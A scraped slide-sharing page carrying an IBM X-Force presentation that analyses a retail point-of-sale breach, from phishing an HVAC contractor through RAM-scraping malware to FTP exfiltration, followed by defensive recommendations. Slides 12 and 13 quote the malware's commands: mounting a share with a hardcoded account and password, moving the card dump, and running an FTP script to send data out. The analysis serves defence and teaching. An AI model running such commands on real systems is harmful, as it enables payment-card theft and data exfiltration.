Orchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
IBM Security
 
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
IBM Security
 
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
IBM Security
 
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
IBM Security
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do Now
IBM Security
 
How to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsHow to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security Operations
IBM Security
 
IBM QRadar UBA
IBM QRadar UBA IBM QRadar UBA
IBM QRadar UBA
IBM Security
 
Mobile Vision 2020
Mobile Vision 2020Mobile Vision 2020
Mobile Vision 2020
IBM Security
 
Retail Mobility, Productivity and Security
Retail Mobility, Productivity and SecurityRetail Mobility, Productivity and Security
Retail Mobility, Productivity and Security
IBM Security
 
Close the Loop on Incident Response
Close the Loop on Incident ResponseClose the Loop on Incident Response
Close the Loop on Incident Response
IBM Security
 
Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats
IBM Security
 

More from IBM Security (20)

Automation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOpsAutomation: Embracing the Future of SecOps
Automation: Embracing the Future of SecOps
 
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
Leaders & Laggards: The Latest Findings from the Ponemon Institute’s Study on...
 
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
Bridging the Gap between Privacy and Security: Using Technology to Manage Com...
 
Integrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM ResilientIntegrated Response with v32 of IBM Resilient
Integrated Response with v32 of IBM Resilient
 
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
The Resilient End-of-Year Review: The Top Cyber Security Trends in 2018 and P...
 
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
Leveraging Validated and Community Apps to Build a Versatile and Orchestrated...
 
Accelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon BlackAccelerating SOC Transformation with IBM Resilient and Carbon Black
Accelerating SOC Transformation with IBM Resilient and Carbon Black
 
How to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent OrchestrationHow to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
How to Build a Faster, Laser-Sharp SOC with Intelligent Orchestration
 
Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?Are You Ready to Move Your IAM to the Cloud?
Are You Ready to Move Your IAM to the Cloud?
 
Orchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
Orchestrate Your Security Defenses to Optimize the Impact of Threat IntelligenceOrchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
Orchestrate Your Security Defenses to Optimize the Impact of Threat Intelligence
 
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
Your Mainframe Environment is a Treasure Trove: Is Your Sensitive Data Protec...
 
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
 
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do Now
 
How to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsHow to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security Operations
 
IBM QRadar UBA
IBM QRadar UBA IBM QRadar UBA
IBM QRadar UBA
 
Mobile Vision 2020
Mobile Vision 2020Mobile Vision 2020
Mobile Vision 2020
 
Retail Mobility, Productivity and Security
Retail Mobility, Productivity and SecurityRetail Mobility, Productivity and Security
Retail Mobility, Productivity and Security
 
Close the Loop on Incident Response
Close the Loop on Incident ResponseClose the Loop on Incident Response
Close the Loop on Incident Response
 
Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats
 

Recently uploaded

Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
RinaMondal9
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 

Recently uploaded (20)

Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 

Anatomy of an Advanced Retail Breach

  • 1. IBM Security Systems Anatomy of an Advanced Retail Breach Chris Poulin Research Strategist, X-Force February 2014 © 2014 IBM Corporation 1 © 2012 IBM Corporation
  • 2. IBM Security Systems Agenda  About the IBM X-Force  Dissection of a retail attack and data breach  Solutions to prevent similar compromises Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM. 2 © 2014 IBM Corporation
  • 3. IBM Security Systems X-Force is the foundation for advanced security and threat research across the IBM Security Framework The mission of X-Force is to:  Monitor and evaluate the rapidly changing threat landscape  Research new attack techniques and develop protection for tomorrow’s security challenges  Educate our customers and the general public 3 © 2014 IBM Corporation
  • 4. IBM Security Systems Collaborative IBM teams monitor and analyze the changing threat landscape Coverage Depth 20,000+ devices 17B analyzed under contract 3,700+ managed clients worldwide 15B+ events managed per day 133 monitored countries (MSS) 1,000+ security related patents 4 web pages & images 40M spam & phishing attacks 73K documented vulnerabilities Billions of intrusion attempts daily Millions of unique malware samples © 2014 IBM Corporation
  • 5. IBM Security Systems Anatomy of the Breach Attacker phishes a 3rd party contractor 4 Malware scrapes RAM for clear text CC stripe data Attacker finds & infects POS systems w/malware 1 3b Attacker uses stolen credentials to access contractor portals 2 Retailer POS systems 5 Attacker finds & infects internal Windows file server Malware sends CC data to internal server; sends custom ping to notify 3a Contractor portals Firewall 6 Attacker FTP servers (external/Russia) 5 Retailer Windows file server Stolen data is exfiltrated to FTP servers internal network © 2014 IBM Corporation
  • 6. IBM Security Systems 1. Phish a 3rd Party Contractor Attacker phishes a 3rd party contractor 1  HVAC firm in PA  Email malware campaign  Citadel password stealing bot, variant of Zeus banking trojan  Primary method of malware detection free version of Malwarebytes Anti-Malware  On-demand scanning; not for commercial use  Supplier portal contains lots of public information – Example: list of resources for HVAC companies 6 © 2014 IBM Corporation
  • 7. IBM Security Systems 2. Access & exploit contractor portal Attacker uses stolen credentials to access contractor portal 2 service.ariba.com 216.109.104.11 NS @ ariba.com Contractor portal Contractors generally not required to use token or other 2-factor authentication amlogin.ewips.partnersonline.com 161.225.202.98, NS @ retailer.com pdzone.retailer.com, 61.225.130.104, NS @ retailer.com 7 © 2014 IBM Corporation
  • 8. IBM Security Systems 3a. Discover & exploit internal file server Attacker finds & infects internal Windows file server 3a  Exact method of movement from portal to internal server unknown  Probably not HVAC partner—cloud-based, not on retailer extranet Retailer Windows file server  Back-end connect from partner portal or other retailer owned asset?  SQL injection, browser exploit, open ingress port, who knows?  Or maybe contractors had access to internal network to monitor HVAC systems remotely 8 © 2014 IBM Corporation
  • 9. IBM Security Systems 3a. Discover & exploit internal file server (cont’d) Attacker finds & infects internal Windows file server 3a  Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata – Created by username John.Doe – Printed recently on Windows DOMAIN  Google search easily reveals location of retail datacenters: Retailer Windows file server  Malware to accumulate stolen card data and exfiltrate regularly (may have been 2 separate servers) – Username=―Best1_user‖; password=―BackupU$r‖ – Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC – Installed as ―BladeLogic‖, hiding as BMC component, BladeLogic Automation Suite; however, BMC doesn’t name any component ―bladelogic.exe‖ – System / Administrator level account; can run batch jobs 9 © 2014 IBM Corporation
  • 10. IBM Security Systems 3b. Find & infect POS systems With a point of presence on an internal server, it’s all unicorns and rainbows from here. Evil unicorns Attacker finds & infects POS systems w/malware 3b Retailer POS systems Retailer Windows file server Image source: http://bigsnarf.wordpress.com/2013/03/10/using-mapreduce-for-fraud-detection-and-prevention/ 10 © 2014 IBM Corporation
  • 11. IBM Security Systems 4. Malware scrapes card data from RAM 4 Malware scrapes RAM for clear text CC stripe data  Trojan.POSRAM, variant of BlackPOS  No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure Retailer POS systems  Looks for ―pos.exe‖ process  Installs trojan, creates registry entries containing string ―POSWDS‖  Scrape RAM for track 1 and track 2 data of financial cards  Card track data is encrypted – Between the reader and POS, and – again between the POS and payment processor  Unencrypted momentarily at the POS as the transaction is cleared  Debit card PINs are hashed at the card reader  Chip-and-PIN encrypts the transaction from the card to processor  Stores stolen card data in file %SystemRoot%system32winxml.dll 11 © 2014 IBM Corporation
  • 12. IBM Security Systems 5. Harvested card data is sent to internal rally point  Moves stolen card data to a central collection point  Assumes POS systems have no internet access  Creates temp Windows share on domain  Malware on rally point creates share in %windir%twain_32 Retailer POS systems Malware sends CC data to internal server; sends custom ping to notify 5  Encodes base64, with encoding string JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau  Moves winxml.dll to <RallyPoint>_<Day>_<Mon>_<Hr>.txt  POS malware sends custom ICMP to as semaphore Retailer Windows file server net use S: <HardCodedIP>c$WINDOWStwain_32 /user:Best1_user BackupU$r move %windir%system32winxml.dll S:<InfectedMachineName>_<Day>_<Month>_<Hour>.txt” net use S: /del 12 © 2014 IBM Corporation
  • 13. IBM Security Systems 6. Card data is exfiltrated to FTP servers in Russia  Compiles all card dumps into c:windowstwain_32a.dll  Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin  Generates an FTP script and executes ftp –s <path>cmd.txt 6 Attacker FTP servers (external/Russia) 13 Retailer Windows file server Stolen data is exfiltrated to FTP servers © 2014 IBM Corporation
  • 14. IBM Security Systems Protect endpoints  The ultimate prize: – POS systems: where the card data is processed – File servers: base of operations – Web servers: initial incursion vector – Contractor workstations: intelligence, credentials  Malware protection: – Contractor workstations (phishing, Citadel bot) – POS systems: RAM scraper trojan – File servers: data management and exfiltration tools – Application isolation (Intel SGX; micro-virtualization, etc) to prevent RAM scraping  Patch  Configuration management 14 © 2014 IBM Corporation
  • 15. IBM Security Systems Protection against web and file server compromises  Secure development lifecycle (SDLC) – Secure coding practices training – Static/source code analysis—manual (code review) and automated – Dynamic code analysis (esp low hanging fruit: SQL injection & XSS) – Include compiled application, web applications, mobile apps  Go-live security process – Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords) – Install appropriate endpoint protection and configuration management – Vulnerability scan  Appropriate authentication – Separate domains / administrative credentials (identity separation) – Multi-factor authentication 15 © 2014 IBM Corporation
  • 16. IBM Security Systems Segment critical assets  Enumerate & classify Image source: http://nationalgeographic.com  Restrict web assets’ access to internal systems  Isolate public / partner facing assets from private assets  Segment operational technology (OT), critical assets, and general IT  Perform firewall rule analysis, paying special attention to: – assets containing sensitive data, such as cardholder information – risky protocols and flow directions  For example, POS systems shouldn’t – mount Windows shares, or – send regular ICMP packets 16 © 2014 IBM Corporation
  • 17. IBM Security Systems Monitor & detect: network  Network activity pattern monitoring can detect: – Suspicious scanning activity as attacker maps out the network landscape – Policy violations for outbound FTP, especially to Eastern Bloc countries  Network packet inspection can detect: – IPS can stop SQL injection, XSS, other more advanced attacks – Credit card number patterns in outbound data – Suspect strings in ICMP packets – Identify network traffic that is not what it seems: e.g., • Non-DNS protocol over port 53 • IRC over port 80 17 © 2014 IBM Corporation
  • 18. IBM Security Systems Monitor & detect: vulnerability and anomaly detection  Vulnerability scanning, including deep endpoint assessment – example: registry entries containing ―POSWDS‖  Anomaly detection – Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access) – Detect deviations from baseline: • POS connecting to Windows shares • POS emitting ICMP packets – General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP – Profile ICMP packet sizes, normal payload contents; identify & block deviations 18 © 2014 IBM Corporation
  • 19. IBM Security Systems Incident Response  Speedy and complete forensics – early in the process if the compromise is detected before data is stolen, or – after a severe breach when accurate impact analysis is critical: • Which systems were compromised? • How many customers were affected? • How much of the data comprised personal information?  Instrument everything feasible, – include POS systems and network activity – Enrich with context from • vulnerability assessment tools • change management transactions • security intelligence feeds. 19 © 2014 IBM Corporation
  • 20. IBM Security Systems Incident / emergency response  Plan should include – Detection – Response and escalation – Engaging law enforcement as appropriate – Preservation of evidence – Compliance with regulations and contractual agreements – Customer and press notification – Public relations.  Engage your contracted external emergency response agency in advance – Help you prepare for a breach and – Gather context about your environment.  Test your process regularly  Business associate contract and assessment 20 © 2014 IBM Corporation
  • 21. IBM Security Systems At IBM, the world is our security lab Security Operations Centers Security Research and Development Labs Institute for Advanced Security Branches More than 6,000 21 IBM researchers, developers, and subject matter experts ALL focused on security 3,000 IBM security patents v13-01 © 2014 IBM Corporation
  • 22. Get Engaged with IBM X-Force Research and Development Follow us at @ibmsecurity and @ibmxforce Download X-Force security trend & risk reports http://www.ibm.com/security/xforce/ Subscribe to X-Force alerts at iss.net/rss.php or IBM Security blog at www.securityintelligence.com 22 IBM Security © 2014 IBM Corporation
  • 23. IBM Security Systems Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY. www.ibm.com/security © Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others. 23 © 2014 IBM Corporation